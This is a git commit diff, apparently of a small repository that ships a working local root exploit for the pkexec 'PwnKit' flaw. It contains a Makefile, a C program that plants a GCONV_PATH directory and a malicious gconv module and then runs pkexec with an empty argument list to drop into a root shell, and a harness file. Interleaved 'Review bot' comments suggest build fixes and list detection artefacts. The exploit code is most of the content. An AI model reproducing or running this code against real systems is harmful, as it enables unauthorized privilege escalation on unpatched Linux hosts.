Init
commit
2bc2c0d48a
@ -0,0 +1 @@
|
||||
out
|
@ -0,0 +1,13 @@
|
||||
VERSION = "\"0.3.2\\n© Ruthenic, 2021\""
|
||||
|
||||
CC ?= gcc
|
||||
target ?= $(shell ${CC} -dumpmachine)
|
||||
CC_FLAGS ?=
|
||||
|
||||
.PHONY: all debug
|
||||
all:
|
||||
gcc -shared src/exploit.c -o out/pwnkit.so -Wl,-soname,libservice.so -Wl,-e,main -fPIC
|
||||
|
||||
debug: CC_FLAGS:=-g -O0 -v ${CC_FLAGS}
|
||||
debug: all
|
||||
|
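Review bot: The `all` recipe hard-codes `gcc` and never references `CC`, `CC_FLAGS`, `target` or `VERSION`, so the `debug: CC_FLAGS:=-g -O0 -v ${CC_FLAGS}` override has no effect and `make debug` builds exactly what `make` builds. Writing the recipe as `${CC} ${CC_FLAGS} -shared src/exploit.c -o out/pwnkit.so ...` would make those variables live; `VERSION` and `target` can be dropped if nothing consumes them. The recipe also writes into `out/`, which the one-line ignore file above suggests is untracked, so a fresh checkout probably needs `mkdir -p out` ahead of the compile line.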
@ -0,0 +1,79 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; //jank to get this working
|
||||
|
||||
void print(const char string[]) {
|
||||
fwrite(string, sizeof(char), strlen(string) + 1, stdout);
|
||||
fwrite("\n", sizeof(char), strlen("\n"), stdout);
|
||||
}
|
||||
|
||||
void gconv() {} //gconv thing
|
||||
|
||||
void gconv_init() {
|
||||
print("pwned lol !");
|
||||
setuid(0);
|
||||
seteuid(0);
|
||||
setgid(0);
|
||||
setegid(0);
|
||||
char *shellArgv[] = {"sh", NULL};
|
||||
execv("/bin/sh", shellArgv);
|
||||
}
|
||||
|
||||
void setup(char *argv[]) {
|
||||
mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
|
||||
mkdir("pwn", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
|
||||
FILE *fp = fopen("GCONV_PATH=./pwn", "w");
|
||||
struct stat buf;
|
||||
fstat(fileno(fp), &buf);
|
||||
fchmod(fileno(fp), buf.st_mode | S_IXUSR | S_IXGRP | S_IXOTH );
|
||||
fclose(fp);
|
||||
system("/bin/cp pwnkit.so pwn/pwnkit.so"); //i cant be fucked
|
||||
fp = fopen("pwn/gconv-modules", "w");
|
||||
char *gconv = "module PWNKIT// INTERNAL pwnkit 2\n"
|
||||
"module INTERNAL PWNKIT// pwnkit 2";
|
||||
fputs(gconv, fp);
|
||||
fclose(fp);
|
||||
}
|
||||
|
||||
void clean() {
|
||||
remove("GCONV_PATH=./pwn");
|
||||
rmdir("GCONV_PATH=.");
|
||||
remove("pwn/pwnkit.so");
|
||||
remove("pwn/gconv-modules");
|
||||
rmdir("pwn");
|
||||
}
|
||||
|
||||
void runAndClean(const char *env[], const char *arg[]) {
|
||||
int pid = fork();
|
||||
if (pid == 0) execve("/usr/bin/pkexec", arg, env);
|
||||
else {
|
||||
waitpid(pid, NULL, 0);
|
||||
print("[Pwnkit] Cleaning up..");
|
||||
clean();
|
||||
}
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
print("[Pwnkit] Setting up directory structure..");
|
||||
setup(argv);
|
||||
print("[Pwnkit] Setting up environment variables..");
|
||||
const char *env[] = {
|
||||
"pwn",
|
||||
"PATH=GCONV_PATH=.",
|
||||
"CHARSET=pwnkit",
|
||||
"SHELL=pwn",
|
||||
"GIO_USE_VFS=",
|
||||
NULL
|
||||
};
|
||||
const char *args[] = { NULL };
|
||||
print("[Pwnkit] Pwning pkexec..");
|
||||
runAndClean(env, args);
|
||||
_exit(0);
|
||||
}
|
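Review bot: This file (presumably `src/exploit.c`, going by the Makefile) has no header comment saying what it demonstrates or which traces it leaves, and that is what a reader doing detection or triage needs from a proof of concept. A short block above `service_interp` would cover it, e.g. `/* PoC for the pkexec argc == 0 argument-handling flaw ("PwnKit"); addressed by patched polkit releases. */`, followed by the artefacts visible in this code: `/usr/bin/pkexec` started with an empty argument vector in `runAndClean()`, a working-directory entry literally named `GCONV_PATH=.`, a `pwn/gconv-modules` file, and `CHARSET`/`SHELL` set to non-standard values in `main()`. Separately, `print()` passes `strlen(string) + 1` to `fwrite`, so a NUL byte is written to stdout before every newline; `fwrite(string, sizeof(char), strlen(string), stdout);` avoids that.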
@ -0,0 +1,7 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
int main(void) {
|
||||
putenv("GCONV_PATH=.");
|
||||
FILE *fp = fopen("exploit.c", "r,ccs=pwnkit");
|
||||
}
|
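Review bot: The `fopen` result is neither checked nor closed, so if the `pwnkit` charset cannot be resolved the program ends silently with nothing to show why; `if (!fp) { perror("fopen"); return 1; }` followed by `fclose(fp);` would make the outcome visible. The file also lacks a comment stating its purpose, which appears to be an unprivileged harness that resolves the gconv module through `GCONV_PATH=.` in its own process without involving pkexec, e.g. `/* Harness: loads the gconv module via GCONV_PATH in this process; expects gconv-modules and exploit.c in the cwd. */`. The Makefile has no rule for this file, so how it is meant to be built is undocumented.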